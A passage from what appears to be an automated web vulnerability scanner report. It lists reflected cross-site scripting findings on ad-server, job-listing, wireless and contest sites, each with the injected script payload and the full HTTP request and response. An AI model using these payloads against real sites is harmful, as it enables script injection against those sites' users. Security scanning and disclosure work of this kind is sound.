The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2fd4c><script>alert(1)</script>bc913fe8b87 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=2fd4c><script>alert(1)</script>bc913fe8b87 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=2fd4c><script>alert(1)</script>bc913fe8b87><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403936|0|225|ADTECH;target=
...[SNIP]...

2.78. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6c42"><script>alert(1)</script>e423f98986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECHd6c42"><script>alert(1)</script>e423f98986 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECHd6c42"><script>alert(1)</script>e423f98986;adiframe=y">
...[SNIP]...

2.79. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d43f"><script>alert(1)</script>1c76bda1778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH?6d43f"><script>alert(1)</script>1c76bda1778=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECH?6d43f"><script>alert(1)</script>1c76bda1778=1;adiframe=y">
...[SNIP]...

2.80. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f2a6f><script>alert(1)</script>8e8573dfda4 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=f2a6f><script>alert(1)</script>8e8573dfda4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=f2a6f><script>alert(1)</script>8e8573dfda4><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECH;target=
...[SNIP]...

2.81. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403940|0|225|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd610"><script>alert(1)</script>29d106ecc94 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]cd610"><script>alert(1)</script>29d106ecc94 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403940|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]cd610"><script>alert(1)</script>29d106ecc94;adiframe=y">
...[SNIP]...

2.82. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4437"><script>alert(1)</script>433a8f59407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECHb4437"><script>alert(1)</script>433a8f59407 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECHb4437"><script>alert(1)</script>433a8f59407;adiframe=y">
...[SNIP]...

2.83. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da704"><script>alert(1)</script>a7fa24a3079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH?da704"><script>alert(1)</script>a7fa24a3079=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECH?da704"><script>alert(1)</script>a7fa24a3079=1;adiframe=y">
...[SNIP]...

2.84. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e7f4a><script>alert(1)</script>713a8b0ffb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=e7f4a><script>alert(1)</script>713a8b0ffb8 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=e7f4a><script>alert(1)</script>713a8b0ffb8><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECH;target=
...[SNIP]...

2.85. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403944|0|170|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a402"><script>alert(1)</script>c6499242c01 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]7a402"><script>alert(1)</script>c6499242c01 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403944|0|170|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]7a402"><script>alert(1)</script>c6499242c01;adiframe=y">
...[SNIP]...

2.86. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be529"><script>alert(1)</script>32ccf94e922 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECHbe529"><script>alert(1)</script>32ccf94e922 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECHbe529"><script>alert(1)</script>32ccf94e922;adiframe=y">
...[SNIP]...

2.87. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfde3"><script>alert(1)</script>86feb4edcdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH?dfde3"><script>alert(1)</script>86feb4edcdc=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECH?dfde3"><script>alert(1)</script>86feb4edcdc=1;adiframe=y">
...[SNIP]...

2.88. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92156"><script>alert(1)</script>4d96c896b2f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]92156"><script>alert(1)</script>4d96c896b2f HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]92156"><script>alert(1)</script>4d96c896b2f;adiframe=y">
...[SNIP]...

2.89. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403971|0|154|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403971|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 64472><script>alert(1)</script>d67b57e15b9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403971|0|154|ADTECH;target=64472><script>alert(1)</script>d67b57e15b9 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=64472><script>alert(1)</script>d67b57e15b9><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403971|0|154|ADTECH;target=
...[SNIP]...

2.90. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d03"><script>alert(1)</script>8cd0b4d7f09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH51d03"><script>alert(1)</script>8cd0b4d7f09 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH51d03"><script>alert(1)</script>8cd0b4d7f09;adiframe=y">
...[SNIP]...

2.91. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc81f"><script>alert(1)</script>6147fcf2f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH?dc81f"><script>alert(1)</script>6147fcf2f5c=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH?dc81f"><script>alert(1)</script>6147fcf2f5c=1;adiframe=y">
...[SNIP]...

2.92. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5a07><script>alert(1)</script>ee1b21623f9 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=f5a07><script>alert(1)</script>ee1b21623f9 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278

<html><body><base target=f5a07><script>alert(1)</script>ee1b21623f9><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH;target=
...[SNIP]...

2.93. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403973|0|154|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe|3.0|5310.1|1403973|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2771"><script>alert(1)</script>fe9daaa66f4 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe|3.0|5310.1|1403973|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]a2771"><script>alert(1)</script>fe9daaa66f4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn|3.0|5310.1|1403973|0|154|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]a2771"><script>alert(1)</script>fe9daaa66f4;adiframe=y">
...[SNIP]...

2.94. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://banking-finance.careerbuilder.com
Path:   /bf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7438e"%20a%3db%2089af122eadb was submitted in the lr parameter. This input was echoed as 7438e" a=b 89af122eadb in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bf.ic/Florida_Miami/?lr=cbcb_mh7438e"%20a%3db%2089af122eadb&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193077
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=3adeb3a3a665452cb3db8746cef2a482-343070718-RL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F382261A0B497E7E52C90A9B44136C94C95BE2C9A785411BADAB46C05F6A5E15C781B87732DBDCFD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:18 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:18 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL21
Date: Sun, 14 Nov 2010 22:25:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh7438e" a=b 89af122eadb" />
...[SNIP]...

2.95. http://banking-finance.careerbuilder.com/bf.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://banking-finance.careerbuilder.com
Path:   /bf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6025c'-alert(1)-'3bfd288b45f was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bf.ic/Florida_Miami/?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&SiteID=cbcb_mh032 HTTP/1.1
Host: banking-finance.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193722
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=903408c97ec947c08e82b77995846faa-343070747-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6509E4FC31D7F51112E8E6BD66A74398A35D57E2B3EBA0654540D3F956B9C1E4072777AFAB66DA72AF8; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:25:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh6025c'-alert(1)-'3bfd288b45f&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.96. http://cf.localwireless.com/wireless/signup.cfm [pageid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cf.localwireless.com
Path:   /wireless/signup.cfm

Issue detail

The value of the pageid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c44"%3b859ccf53fe9 was submitted in the pageid parameter. This input was echoed as 13c44";859ccf53fe9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wireless/signup.cfm?sid=1007&pageid=textalert1_main13c44"%3b859ccf53fe9 HTTP/1.1
Host: cf.localwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:24:13 GMT
Server: Apache
P3P: CP="CAO PSA OUR"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4535



...[SNIP]...
er out internal URLs for exit link tracking.
s.s_timeZone = "-5" //Timezone for time parting plug-in. Use -5 for EST, -6 for CST, -7 for MST, and -8 for PST

/* props*/
s.pageName="textalert1_main13c44";859ccf53fe9" //gn: Page Name
s.hier1="miami+herald,wap,signup,index" //h1: Hierarchy
s.prop1="" //c1: internal search terms
s.prop2="" //c2: internal search type
s.prop3="" //c3: # of search results
s.prop4=
...[SNIP]...

2.97. http://contest.herald.com/cirquekoozamiami/standard/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /cirquekoozamiami/standard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460ad"><script>alert(1)</script>c14ec16b048 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cirquekoozamiami/standard/?460ad"><script>alert(1)</script>c14ec16b048=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:24:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7334
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=NLNLEONDOGIEOKCHIODLANOL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/cirquekoozamiami/standard/index.asp?460ad"><script>alert(1)</script>c14ec16b048=1" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.98. http://contest.herald.com/nascar/standard/ [9cec8">2f7e3e1de94 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/

Issue detail

The value of the 9cec8"><script>alert(1)</script>2f7e3e1de94 request parameter is copied into the HTML document as plain text between tags. The payload c6ae2<script>alert(1)</script>890e9b13aa5 was submitted in the 9cec8"><script>alert(1)</script>2f7e3e1de94 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/?9cec8"><script>alert(1)</script>2f7e3e1de94=1c6ae2<script>alert(1)</script>890e9b13aa5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
